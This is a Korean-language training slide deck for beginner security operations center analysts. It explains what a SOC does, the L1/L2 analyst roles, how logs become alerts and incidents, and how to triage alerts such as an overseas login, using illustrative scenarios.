Module 1. SOC 개요 (4H) – 26년 AI 보안운영 및 위협탐지 실무인력 양성

26년 AI 보안운영 및 위협탐지 실무인력 양성 · (주)아울네스트

Module 1.
SOC 개요

공격을 완전히 막는 것이 아니라, 빠르게 발견하고 근거 있게 대응하는 운영 체계

대상

비전공 입문자 / 보안 관제 입문자

시간

총 4시간 (이론 3H + 실습 1H)

핵심 키워드

SOC · SIEM · EDR · Alert · Incident

🛡️

(주)아울네스트

한국인터넷진흥원 발주 · 2026

오늘의 여정

4시간 안에 SOC의 전체 그림을 잡는다

과정 안내

Intro
15분

→

SOC란
35분

→

운영 구조
45분

→

이벤트 흐름
30분

→

보안 도구
35분

→

공격 시나리오
40분

→

실습
30분

대상

비전공 입문자
보안 관제 입문자

핵심 키워드

SOC, Log, Event, Alert, Incident, SIEM, EDR, SOAR

오늘의 목표

Alert를 보고 1차 판단할 수 있는 관점 익히기

각 파트가 오늘 실습과 어떻게 연결되는가

SOC란? — "무엇을 하는 조직인지" 전체 그림을 잡아야 나머지가 의미를 가진다

운영 구조 — "내가 어떤 역할인지"를 알아야 내 판단의 책임 범위를 안다

이벤트 흐름 — Log·Alert·Incident를 구분하지 못하면 실습 질문 자체를 이해할 수 없다

보안 도구 — 도구 이름이 나올 때 "어디서 무엇을 보는 도구인지" 연결하기 위해

오늘 수업에서 반드시 가져가야 할 것

개념 암기가 아니라, Alert를 보고 기본 판단을 내릴 수 있게 되는 것

학습 목표

개념 이해

SOC의 정의와 역할을 설명할 수 있다

구분 능력

Log / Event / Alert / Incident의 차이를 구분할 수 있다

도구 이해

SIEM / EDR / IDS·IPS / SOAR의 역할을 설명할 수 있다

판단 실습

간단한 Alert에 대해 근거 기반 1차 판단을 작성할 수 있다

모든 파트는 마지막 실습과 연결됩니다. "정답 암기"가 아니라 "판단 기준 이해"에 초점을 맞춰주세요.

"이걸 배우면 실제로 뭐가 달라지나요?"

수업 전: 화면에 경고: 해외 IP 로그인 감지 라는 알람이 뜨면 "어떻게 해야 하지?" 막막하다.
수업 후: 이 계정이 민감한가? 출장 등록이 있는가? 로그인 후 어떤 행동을 했는가?를 순서대로 확인하고, "재무 계정이며 출장 기록 없음, 직후 대량 다운로드 → HIGH, L2 에스컬레이션 권고"를 문장으로 쓸 수 있다.

예방만으로는 충분하지 않다

차이는 "막았느냐"보다 "얼마나 빨리 발견하고 정확히 대응했느냐"에서 난다

Why SOC?

공격 표면 확대

클라우드 · SaaS · 원격근무 · 외부 협업
모든 위협을 사전에 차단하는 것은 현실적으로 불가능

피해의 핵심 변수

침해 피해는 "발생 여부"보다
"발견 지연 시간"에 크게 좌우된다

🛡️

예방 중심

완전 차단 불가

⬇️ 패러다임 전환

📡

탐지 · 판단 · 대응 중심

빠른 발견 + 정확한 대응

비유로 이해하기

❌ 예방만 있는 보안

마치 아파트 정문에만 경비원을 세우고 내부 복도나 층간에는 CCTV도 없는 것과 같다. 침입자가 정문을 한 번 통과하면 내부에서 무슨 일이 일어나는지 전혀 알 수 없다.

✅ 탐지·대응 중심 보안

정문 외에도 각 층 복도, 엘리베이터, 주차장에 CCTV를 두고, 이상 행동이 감지되면 즉시 내부 경비팀이 달려가는 체계. SOC는 그 CCTV를 24시간 보는 관제 센터다.

최근 위협 맥락

왜 탐지와 대응 속도가 중요한가 – 실제 데이터로 보기

Why SOC?

68%

인적 요소 관련 침해
(피싱·자격증명·실수)

194일

평균 침해 탐지 소요 시간
(산업 평균, 글로벌)

≤1h

성숙한 SOC의 목표 MTTD
(Mean Time To Detect)

공격은 언젠가 들어온다. 차이는 얼마나 빨리 발견하고 얼마나 정확히 대응하느냐에서 난다.

참고: Verizon 2025 DBIR, IBM Cost of a Data Breach Report

보강 설명Verizon 2025 DBIR 등 최근 보고서에 따르면, 침해 사고의 상당수가 피싱과 자격증명 탈취에서 시작됩니다. 그리고 침해 발견까지 수일에서 수개월이 걸리는 경우도 많습니다. 이 지연…

DBIR피싱자격증명

설명 확장

DBIR 관점에서 이 주제의 목적을 다시 설명하기
피싱 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

DBIR·피싱 핵심어를 한 문장으로 정리하기
실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

NIST CSF 2.0과 SOC의 위치

SOC는 Detect · Respond · Recover의 핵심 실행 조직

프레임워크

🏛️

Govern

거버넌스·전략

🔍

Identify

자산·위험 식별

🛡️

Protect

예방·보호

📡

Detect

탐지 ← SOC 핵심

🚨

Respond

대응 ← SOC 핵심

🔄

Recover

복구 ← SOC 연계

NIST CSF 2.0의 6가지 기능 중 SOC는 Detect · Respond · Recover를 직접 실행하는 운영 조직

NIST CSF 5가지 기능 — SOC는 어디서 일하는가?

GOVERN

정책·전략·리스크

CISO·경영진

IDENTIFY

자산·취약점 파악

L3 일부 관여

PROTECT

방화벽·패치·훈련

IT운영팀 주도

DETECT ★

이상징후 탐지·모니터링

SOC 핵심 업무

RESPOND ★

봉쇄·대응·복구

IR팀 핵심 업무

💡 SOC는 DETECT + RESPOND를 담당합니다. "예방"(PROTECT)은 IT팀 몫이고, SOC는 예방이 뚫렸을 때 가동됩니다.

비유로 이해하는 SOC

잠금장치만으로는 모든 침입을 막을 수 없다

Why SOC?

🔒

예방 = 잠금장치

방화벽, 접근통제, 패치, 정책
→ 진입을 어렵게 만든다
→ 하지만 완벽하지 않다

📹

SOC = CCTV + 경비실

모니터링, 분석, 판단, 대응
→ 이상 징후를 빠르게 발견한다
→ 피해를 최소화한다

현대 보안 운영 = 잠금장치(예방) + CCTV·경비실(SOC) + 비상 대응팀(IR)

보강 설명비유로 설명하면, 예방은 건물에 잠금장치를 다는 것이고, SOC는 CCTV와 경비실을 운영하는 것입니다. 잠금장치만으로는 모든 침입을 막을 수 없기 때문에, 이상 징후를 실시간으로 감시하고…

예방탐지비유

설명 확장

예방 관점에서 이 주제의 목적을 다시 설명하기
탐지 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

예방·탐지 핵심어를 한 문장으로 정리하기
실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

SOC란 무엇인가

SOC의 정의, 미션, 운영 사이클, 데이터, 협업 구조

약 35분

SOC 정의 미션 운영 사이클 3요소 협업 구조

SOC(Security Operations Center)란 무엇인가

사람 + 프로세스 + 기술을 결합해 보안 이벤트를 모니터링하고 판단하며 대응을 연결하는 운영 조직

Part 1

수집

보안 로그와 텔레메트리를 수집한다

탐지·분석

이상 징후를 탐지하고 분석한다

판단

실제 위험인지 판단한다

대응 연결

필요한 대응을 수행하거나 적절한 팀으로 연결한다

SOC

People

Decision

Technology

Process

SOC는 기술 시스템이 아니라
운영 체계입니다

보강 설명SOC를 단순히 보안 관제실 정도로 이해하면 절반만 이해한 것입니다. SOC의 본질은 모니터링 화면을 보는 것이 아니라, 보안과 관련된 신호를 근거로 의미 있는 운영 판단을 내리는 데 있습니다…

사람프로세스기술

설명 확장

사람 관점에서 이 주제의 목적을 다시 설명하기
프로세스 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

사람·프로세스 핵심어를 한 문장으로 정리하기
실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

SOC의 진짜 산출물은 무엇인가

로그 자체가 아니라, 근거와 우선순위가 붙은 "판단"이다

Part 1

Input
로그, 이벤트, 경고
위협 정보

→

Process
상관분석, 분류
조사, 검증

→

Output
판단, 티켓
에스컬레이션, 대응 권고

MTTD

Mean Time To Detect
탐지 속도

MTTR

Mean Time To Respond
대응 속도

FPR

False Positive Rate
오탐률

Coverage

Detection Coverage
탐지 범위

로그가 판단으로 바뀔 때 실제로 추가되는 것

의미 부여
단순 신호를 정상 운영인지, 위협 가능성이 있는지 설명 가능한 문장으로 바꾼다

우선순위
지금 조치할지, 모니터링할지, L2/IR로 넘길지 결정 기준이 생긴다

다음 행동
티켓·에스컬레이션·사용자 확인처럼 누가 무엇을 할지까지 연결된다

→ 그래서 좋은 SOC는 로그 양보다 MTTD, MTTR, FPR, Coverage 같은 운영 지표를 함께 본다.

보강 설명초보자들이 흔히 하는 오해는 SOC는 로그를 보는 조직이라는 생각입니다. 하지만 로그는 원재료일 뿐입니다. 실제로 비즈니스에 필요한 것은 이게 위험한가, 얼마나 급한가, 누가 무엇을 해야…

판단우선순위MTTD

설명 확장

판단 관점에서 이 주제의 목적을 다시 설명하기
우선순위 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

판단·우선순위 핵심어를 한 문장으로 정리하기
실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

SOC는 반복 루프로 운영된다

수집에서 끝나지 않고, 대응과 룰 개선까지 돌아야 SOC 운영이 완성된다

Part 1

수집
Collection

방화벽·서버·클라우드

→

정규화·상관분석
Correlation

→

Alert 생성
Detection

→

1차 분류
Triage

→

상세 조사
Investigation

→

대응
Response

→

피드백·개선
Improve

Improve → 다시 Collection으로 연결 | 이 루프가 돌아야 같은 공격을 다음에는 더 빨리 잡을 수 있다

각 단계를 실무 용어로 풀면

수집(Collection): 서버·PC·방화벽·클라우드 등에서 로그를 SIEM으로 끌어모음

정규화·상관분석: 제각각인 로그 형식을 통일하고, 여러 곳의 이벤트를 서로 연결

Triage(1차 분류): Alert 500개 중 진짜 조사할 50개를 빠르게 추려내는 관문

개선(Improve): "이번에 왜 놓쳤나"를 탐지 룰과 운영 절차에 반영해 다음 번엔 더 빨리 잡음

Assume Breach: 이미 뚫렸다고 가정하라

현대 보안 전략의 핵심 패러다임

Part 1

❌

과거의 접근

"방화벽과 백신이 있으니
내부는 안전하다"

→ 한 번 뚫리면 무방비

✅

현대의 접근 (Assume Breach)

"이미 침해자가 내부에
있을 수 있다고 가정한다"

→ 항상 탐지하고 검증한다

Zero Trust + Assume Breach = 누구도 신뢰하지 않고, 항상 검증하며, 침해를 전제로 탐지·대응 체계를 설계한다
→ SOC는 이 패러다임의 실행 조직

병원 비유

예전 보안: "건물 입구에서 발열 체크 → 통과하면 안전"
Assume Breach: "통과했더라도 내부에서 계속 이상 징후를 모니터링" — 병동 안에서도 CCTV, 출입 기록, 약품 접근 이력을 추적한다

은행 비유

예전 보안: "금고 열쇠를 가진 사람은 신뢰"
Assume Breach: "열쇠를 가진 직원이라도 비정상 시간, 비정상 금액 인출은 자동 감지·경보" — 내부자 위협도 탐지 대상

SOC가 없거나 실패하면?

탐지 지연 = 피해 확대 — 시간이 곧 비용이다

Why SOC?

탐지 지연 시

공격자가 수주~수개월 내부 활동
데이터 대량 유출 후 발견
복구 비용 수배~수십배 증가
브랜드 신뢰도 회복 불가 수준 하락
법적 책임 · 과징금 · 소송

빠른 탐지 시

공격자 활동 초기 단계에서 차단
피해 범위 최소화
복구 비용 대폭 절감
비즈니스 연속성 유지
규제 대응 신속 완료

침해 비용의 핵심 변수: 발견까지 걸린 시간(MTTD) — SOC가 이것을 줄이는 조직이다

같은 사고도 발견 시점에 따라 달라지는 운영 난이도

초기 발견 (1시간 이내)
계정 잠금·세션 종료·호스트 격리처럼 국소 조치로 피해를 작게 묶을 수 있다

중간 발견 (하루 단위)
측면 이동, 추가 수집, 동일 계정 확산 여부까지 조사해야 해 범위가 넓어진다

늦은 발견 (수일~수주)
유출·복구·법무·언론 대응까지 번져 기술 문제를 넘어 비즈니스 사고가 된다

보강 설명SOC가 없거나 제대로 작동하지 않으면 어떤 일이 벌어지는지 실제 사례를 통해 보겠습니다. 탐지 지연은 곧 피해 확대로 이어집니다.

실패탐지 지연피해

설명 확장

실패 관점에서 이 주제의 목적을 다시 설명하기
탐지 지연 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

실패·탐지 지연 핵심어를 한 문장으로 정리하기
실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

SOC의 다양한 운영 형태

어떤 형태든 핵심 기능(탐지·분석·판단·대응)은 동일하다

Part 1

 자체 SOC (In-house)
조직 내부에 직접 구축·운영
높은 통제력과 맞춤형 운영
비용과 인력 부담 큼


 위탁 SOC (MSSP)
전문 보안 업체에 운영 위탁
비용 효율적, 빠른 도입
커스터마이징 한계


 하이브리드 SOC
핵심은 내부, 일부는 위탁
가장 많이 채택되는 형태
통제력과 효율성 균형

본 과정에서 배우는 SOC 운영 원칙은 모든 형태의 SOC에 동일하게 적용됩니다

어떤 형태를 선택하는가? — 조직별 현실 고려사항

자체 SOC 선택 시

규제 산업(금융·의료·공공)에서 내부 데이터를 외부에 보내기 어렵거나, 매우 특화된 탐지 룰이 필요한 경우. 초기 구축비용이 높지만 장기적으로 맞춤화 가능.

MSSP 선택 시

보안 인력 채용이 어렵거나 예산이 제한적인 중소기업. 빠른 도입과 24시간 운영이 가능하지만, 업종 특화 탐지나 내부 정책 맞춤에 한계가 있다.

하이브리드 선택 시 (가장 일반적)

핵심 분석(L2·L3)은 내부에서 하고, 24시간 Alert 모니터링(L1)은 외주. 또는 SIEM 인프라는 직접 운영하되 위협 인텔리전스 피드는 MSSP에서 제공받는 구조.

SOC의 비즈니스 가치

탐지와 대응 역량이 비용에 미치는 실제 영향

Part 1

$4.88M

글로벌 평균 침해 비용
(2024, IBM)

-$1.76M

SOC/IR팀 보유 시
절감되는 평균 비용

100일+

200일 내 탐지 vs 이후 탐지
비용 차이 발생 구간

SOC는 비용 센터가 아니라 리스크 절감 투자 — 빠른 탐지가 수십억 원의 차이를 만든다

이 숫자가 실제로 의미하는 것

$4.88M (약 66억 원): 단순히 데이터 복구 비용이 아니다. 법률 비용, 규제 과징금, 고객 이탈, 브랜드 가치 하락, 임직원 대응 시간, 언론 대응, 시스템 재구축 비용을 모두 합친 숫자다.

-$1.76M (약 24억 원) 절감: SOC/IR팀이 있는 기업은 같은 침해가 발생해도 훨씬 빠르게 탐지·격리하기 때문에 피해 범위 자체가 달라진다. 연간 SOC 운영비와 비교하면 대부분의 경우 투자 대비 효과가 크다.

SOC 성숙도 단계

하루아침에 완성되지 않는다 — 오늘 배우는 것은 모든 단계의 기본기

Part 1

Lv.1

기본 수집

로그 수집·보관 시작
수동 확인 위주

Lv.2

규칙 기반 탐지

SIEM Alert 룰 운영
L1·L2 역할 분담

Lv.3

위협 헌팅

능동적 탐지 설계
ATT&CK 매핑

Lv.4

자동화·예측

SOAR 연동
AI/ML 기반 탐지

오늘 과정의 목표: Lv.2 수준의 기본기를 확실히 갖추기 — Log·Event·Alert·Incident 구분, Triage, 판단문 작성

각 레벨을 현실 조직으로 이해하면

Lv.1
방화벽 로그를 주 1회 수동 확인. 어디서 공격이 왔는지도 2주 후에 알게 되는 수준.

Lv.2 ← 오늘 목표
SIEM에 룰이 있고, Alert가 뜨면 L1이 분류하고 L2가 조사한다. 대부분의 중견·대기업 SOC.

Lv.3
공격이 Alert로 뜨기 전에 먼저 능동적으로 찾는다. 위협 헌팅 전담 인력이 있다.

Lv.4
반복 업무는 자동화. AI/ML이 이상 행위를 먼저 탐지해 분석가에게 우선순위를 제안한다.

SOC는 "여러 출처의 흔적"을 본다

동일한 행위도 사용자 맥락, 자산 중요도, 네트워크 흐름이 결합될 때 비로소 의미가 생긴다

Part 1

인증 로그

로그인 성공/실패, MFA, VPN, SSO

엔드포인트 로그

프로세스 실행, 파일 생성, PowerShell, 서비스 변경

네트워크 로그

DNS, Proxy, Firewall, IDS/IPS, NetFlow

클라우드 로그

IAM, API 호출, 저장소 접근, 관리 작업

이메일 로그

수신, 링크 클릭, 첨부 실행

컨텍스트 데이터

자산 중요도, 사용자 권한, 취약점, 위협 인텔리전스

좋은 SOC일수록 단순 로그 수집보다 컨텍스트 결합 능력이 중요하다

데이터 소스별 실무 예시

인증 로그 예시: "finance01이 오전 3시에 싱가포르 IP로 로그인 성공. 평소 서울에서만 접속." → 해외 접속 Alert 발생

엔드포인트 예시: "영업부 PC에서 cmd.exe → powershell.exe → 외부 IP 통신" 프로세스 트리 → 악성코드 감염 의심

네트워크 예시: "내부 서버가 평소 보내지 않던 외부 도메인에 443포트로 대량 데이터 전송" → 데이터 유출 의심

클라우드 예시: "AWS에서 새 IAM 사용자가 생성되고 S3 버킷 공개 설정 변경" → 권한 오용 또는 설정 오류

이메일 예시: "CFO에게 발신자명이 CEO지만 도메인이 micro5oft.com인 메일" → CEO 사칭 BEC 공격

컨텍스트 예시: "admin 계정 로그인 → 해당 계정 오너가 어제 퇴사 처리됨" → 퇴사자 계정 악용 가능성

같은 행위, 다른 맥락 = 다른 판단

컨텍스트가 없으면 같은 로그도 전혀 다르게 해석된다

Part 1

사례 1: 정상

                    user=kim_dev

                    src_country=US

                    result=login_success

컨텍스트: 출장 등록 확인됨, 미국 컨퍼런스 참석 중, 평소 사용 디바이스

정상 — Close

사례 2: 의심

                    user=finance01

                    src_country=US

                    result=login_success

컨텍스트: 출장 없음, 재무 VIP 계정, 신규 디바이스, 야간, 직후 대량 다운로드

HIGH — Escalate

로그는 같아도 맥락이 다르면 판단이 완전히 달라진다 — 이것이 SOC 분석의 핵심

같은 로그, 다른 맥락 — 추가 사례

🖥️ 관리자 권한 명령 실행

✅ 정상:

IT 팀원이 업무 시간에 유지보수 계획서에 따라 실행

🚨 위험:

같은 명령을 야간에 인턴 계정으로 실행 + 승인 기록 없음

📁 대량 파일 조회

✅ 정상:

월말 결산 담당자가 재무 폴더 수백 개 조회 → 매달 있는 패턴

🚨 위험:

같은 행위를 처음 접속하는 임시 계정이 새벽에 수행

SOC는 단독 플레이어가 아니다

탐지는 SOC가 하지만, 실제 대응은 IT·IAM·네트워크·현업과의 연결 위에서 완성된다

Part 1

 SOC탐지, 분석
우선순위 결정
에스컬레이션
 IT 운영시스템 점검
서버 조치
변경 이력 확인
 IAM계정 잠금
비밀번호 초기화
권한 검토

네트워크/클라우드

차단, 라우팅
정책 수정

현업/시스템 오너

정상 여부 확인
영향도 판단

법무/홍보/경영진

고위험 사고 시
커뮤니케이션

실제 에스컬레이션 흐름: "해외 IP 로그인 Alert 발생"

SOC L1: 수신 → 계정 확인 → L2로

→

L2: "HIGH 판단" → IR 호출

→

IAM: 세션 종료

현업: 본인 확인

SOC는 "탐지+1차 판단"까지. 계정 잠금·격리·알림은 각 담당 팀이 실행한다. SOC는 "무전기"고, 행동은 현장 팀이 한다.

협업이 실패할 때 생기는 일 — 실제 패턴 2가지

❌ 사일로(Silo) 문제: L1이 에스컬레이션했는데 L2가 업무 공유 없이 응답 안 함. L1은 닫아야 할지 몰라 3시간 방치. 그 사이 공격자는 내부 이동 완료.

❌ 정보 손실 핸드오프: L1이 "이상한 트래픽 있음"만 적고 에스컬레이션. L2 인수 시 필요 로그 없어 처음부터 재조사 → 원본 로그는 이미 덮어쓰기 됨.

✅ 좋은 에스컬레이션의 4요소: ① 관련 로그 스냅샷 + ② 이미 확인한 것 + ③ 아직 모르는 것 + ④ 본인 판단 근거. 이 4가지가 있으면 L2는 처음부터 다시 시작하지 않아도 됩니다.

Check Point: Part 1 복습

지금까지 배운 내용을 빠르게 점검합니다

Part 1 · 퀴즈

스스로 답해 보세요

Q1. SOC를 한 문장으로 정의한다면?

Q2. SOC의 핵심 산출물은 "로그"인가, "판단"인가?

Q3. MTTD와 MTTR은 각각 무엇의 약자이고, 왜 중요한가?

Q4. SOC 운영 사이클에서 마지막 단계는 무엇이고, 왜 중요한가?

Q5. SOC가 단독으로 사고를 해결할 수 없는 이유는?

보강 설명핵심 개념을 짧게 꺼내보는 점검 구간입니다. 정답 여부보다 설명 순서와 근거가 더 중요합니다.

퀴즈복습

답변 힌트

핵심 정의를 한 문장으로 먼저 답하기
예시는 1개만 붙여 간결하게 설명하기
용어 차이는 목적과 역할로 구분해 말하기

생각 순서

사실 → 맥락 → 판단 순서를 유지하기
오탐 가능성과 추가 확인 항목을 함께 적기
마지막은 다음 조치 제안으로 마무리하기

토론 포인트

다른 역할이라면 같은 질문을 어떻게 볼지
판단을 바꿀 추가 데이터가 무엇인지
실무에서의 영향과 우선순위까지 연결하기

Part 1 요약 — SOC란 무엇인가

Part 1 · 요약

✓ 정의: SOC = People + Process + Technology로 구성된 운영 체계

✓ 산출물: 로그가 아니라 근거와 우선순위가 붙은 판단

✓ 운영: 수집 → 분석 → 탐지 → 대응 → 개선의 반복 루프

✓ 데이터: 단일 로그가 아니라 여러 출처의 흔적을 결합

✓ 협업: SOC 단독이 아니라 IT·IAM·현업과의 연결 위에서 완성

Part 1의 핵심을 한 문장으로

"SOC는 공격을 완전히 막는 조직이 아니라, 빠르게 발견하고 근거 있게 판단하여 대응팀에 연결하는 조직이다"

이 한 문장을 기억하면 Part 2~6의 모든 내용이 그 아래 구체적인 방법론으로 연결된다.

보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.

운영 체계판단사이클

핵심 회수

운영 체계·판단 핵심어를 세 문장으로 압축해 보기
정의보다 역할·가치·흐름을 연결해서 설명하기
비슷한 개념과의 차이를 짧게 대비해 보기

실무 연결

현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
판단이 필요한 순간과 비용을 함께 생각하기
오탐과 과소판단이 만드는 리스크를 비교하기

복습 체크

혼자 설명 가능한 핵심 용어 3개 고르기
다음 모듈과 이어질 질문 1개 만들어 보기
실무 문장으로 바꾸어 다시 써 보기

SOC 운영 구조

L1 · L2 · L3 · IR/CERT 역할과 핸드오프

약 45분

L1 분석가 L2 수석 L3 전문가 에스컬레이션 IR/CERT

대표적인 SOC 운영 구조

대부분의 SOC는 난이도와 책임에 따라 L1 · L2 · L3 · IR 형태로 역할이 나뉜다

Part 2

🔍 L1Alert Triage
1차 분류
빠르고 일관된 판단
🔬 L2Deep Analysis
상세 분석
범위 파악, 인시던트 판단
🎯 L3Detection Engineering
헌팅, 룰 개선
탐지 공백 메우기
능동적으로 위협을 먼저 찾는다. ATT&CK 매핑으로 탐지 공백을 파악하고 룰을 작성한다.
🚨 IR/CERTIncident Response
격리, 차단, 복구
사후 조치
실제 대응의 최종 단계. 시스템 격리·포렌식·복구·사후 보고까지 담당한다.

광범위·빠른 분류

→

깊은 분석

→

개선·헌팅

→

실제 대응

조직에 따라 역할 명칭과 경계는 다를 수 있음 – 본 슬라이드는 교육용 대표 모델

보강 설명이 구조는 절대적인 표준이라기보다, 실무에서 가장 널리 쓰이는 설명 방식입니다. 핵심은 누가 더 높은 직급인가가 아니라, 어떤 수준의 판단과 책임을 맡는가입니다.

L1L2L3

설명 확장

L1 관점에서 이 주제의 목적을 다시 설명하기
L2 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

L1·L2 핵심어를 한 문장으로 정리하기
실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

L1: Alert Triage의 최전선

L1의 핵심 역량은 빠른 속도보다 "빠르고 일관된 분류"다

Part 2

L1이 하는 일

Alert의 사실 여부 확인
중복 / 명백한 오탐 제거
기본 컨텍스트 보강
Severity 초기 설정
문서화 후 L2 또는 IR로 에스컬레이션

False Positive / Benign

Monitor / Watch

Escalate to L2

L1 체크 질문 (답이 "예"일 때의 결과)

✓ 룰이 정상 동작했는가? → 아니오(오류 로그)면 닫기. 예이면 다음으로.
✓ 이미 알려진 정상 행위인가? → 예(변경 관리 기록 있음)면 Benign 처리.
✓ 민감 계정/중요 자산 관련인가? → 예이면 작은 정황도 L2로 에스컬레이션.
✓ 즉시 조치가 필요한 신호인가? → 예(확산·파괴 징후)이면 L2 기다리지 말고 IR 즉시 통보.

보강 설명L1은 흔히 초급 역할로 생각되지만, 실제로는 SOC 전체 품질을 좌우하는 관문입니다. L1이 오탐을 잘 걸러내지 못하면 상위 분석가가 소음에 묻히고, 반대로 진짜 위험을 놓치면 대응 타이밍을…

Triage일관성오탐 제거

설명 확장

Triage 관점에서 이 주제의 목적을 다시 설명하기
일관성 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

Triage·일관성 핵심어를 한 문장으로 정리하기
실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

L1 분석가의 하루

하루 수백 건의 Alert 중 진짜 위험을 놓치지 않는 것이 핵심

Part 2

500+

하루 평균 Alert 수

~80%

오탐 또는 정상 행위

~5%

실제 에스컬레이션 필요

일반적인 L1 업무 흐름

Alert 큐 확인 → 사실 확인 → 오탐 닫기 → 컨텍스트 보강 → 에스컬레이션 → 문서화

⚠ "숫자보다 중요한 것은 맥락이다" — 200회 로그인 실패가 공격인지, 서비스 설정 오류인지는 맥락을 봐야 안다

❌ L1이 자주 하는 실수

Alert가 많으니 기계적으로 "Close" — Alert Fatigue
로그인 실패 200회 = 무조건 공격으로 에스컬레이션 — 서비스 설정 오류일 수 있음
문서화 없이 구두로만 전달 — 인수인계 때 정보 손실
컨텍스트 확인 없이 로그 하나만 보고 판단

✅ 좋은 L1의 습관

Alert 닫기 전 "왜 닫는지" 한 줄 메모 남기기
오탐 패턴을 팀과 공유해 룰 개선 건의
에스컬레이션 시 "내가 확인한 것"과 "아직 모르는 것"을 구분해서 전달
중요 계정/자산 목록을 숙지해 우선순위 빠르게 판단

L1 분석가의 실제 8시간 — 야간 22:00~06:00 타임라인

22:00교대 인수인계 — 이전 조로부터 진행 중인 케이스 2건 인수, 활성 Alert 37건 확인 23:10Alert#1142: "외부IP 로그인 시도 50회" → 블록리스트 IP 조회 → 알려진 스캐너 봇 → Benign 처리 00:30Alert#1198: "관리자 계정 새벽 로그인" → 변경관리 DB 확인 → 예정된 배치 작업, Benign 02:47Alert#1231: "내부 서버→외부 C2 비정상 트래픽" → 즉시 L2 에스컬레이션 + 상세 컨텍스트 문서화 03:30Alert 14건 추가 처리 — 자동화 도구, 모니터링 봇, 정기 스캔 → 대부분 오탐 05:45교대 준비 — 처리 52건, 에스컬레이션 1건, 미해결 0건. 인수인계 문서 작성 완료.

💡 52건 중 51건은 "아무 일 없음"이 올바른 답이었습니다. L1의 가치는 그 02:47의 1건을 놓치지 않는 것에 있습니다. 지루한 밤이 좋은 밤입니다.

L2: 무슨 일이 일어났는지 재구성하는 분석가

행위의 맥락과 범위, 영향도를 설명하는 것이 L2의 역할

Part 2

L2가 하는 일

관련 로그와 이벤트를 추가 수집
시간순 타임라인 재구성
영향받은 계정/호스트/서비스 범위 확인
가설 검증: 정상행위 vs 비정상행위
Incident 여부 판단 및 대응 권고

L2와 L1의 차이: L1은 "이 Alert를 처리해야 하는가?"를 결정. L2는 "무슨 일이 실제로 일어났는가?"를 설명. L1은 100건 빠르게, L2는 10건 깊게.

Who · What · When · Where · How

⬇

Timeline Reconstruction

⬇

Scope / Impact / Verdict

L2 실제 조사 예시: "해외 IP 로그인" Alert 받았을 때

① L1 에스컬레이션 노트 확인: "22:14 싱가포르 IP, finance01, 신규 디바이스, MFA 성공"

② SIEM에서 동일 계정 전후 30분 행동 조회: 로그인 직후 340개 파일 조회, 85개 다운로드 확인

③ 해당 IP 위협 인텔리전스 조회: VirusTotal / AbuseIPDB → 알려진 VPN 출구 노드인지 확인

④ 사용자 HR 정보 확인: 출장 등록? 재택 승인? 평소 접속 국가 이력?

⑤ 타임라인 완성 + Verdict 작성: "HIGH — 계정 탈취 가능성. IR 에스컬레이션 + 세션 종료 권고"

L2 조사 실제 흐름 — "관리자 계정 새벽 3시 로그인" 케이스

STEP 1 타임라인지난 30일 로그인 이력 전수 조회 → "이 계정은 항상 오전 9~18시에만 사용됐다"

STEP 2 측면이동로그인 후 접근 시스템 확인 → 평소 미사용 HR DB + 재무 시스템 접근 기록 발견

STEP 3 데이터30분 내 HR DB 3,000건 조회 → 평소 하루 최대 50건 → 대량 수집 패턴 확인

STEP 4 확인계정 소유자 전화 → "저 오늘 새벽 3시에 일 안 했는데요?" → 계정 탈취 확정

STEP 5 대응계정 즉시 잠금 + IR팀 통보 + 피해 범위 초안 작성 → Incident 공식 선언

💡 L1이 "이상한 로그인"을 에스컬레이션했고, L2가 "계정 탈취 + 내부 데이터 유출"로 재구성했습니다. 같은 Alert, 완전히 다른 깊이의 분석입니다.

L1 vs L2: 같은 Alert, 다른 관점

넓고 빠르게 vs 좁고 깊게

Part 2

구분	L1 (Triage)	L2 (Investigation)
핵심 질문	"이것은 진짜인가, 오탐인가?"	"실제로 무슨 일이 일어났는가?"
시간 투자	Alert당 2~10분	Case당 30분~수 시간
관점	단일 Alert 기준 분류	관련 이벤트 전체를 타임라인으로 재구성
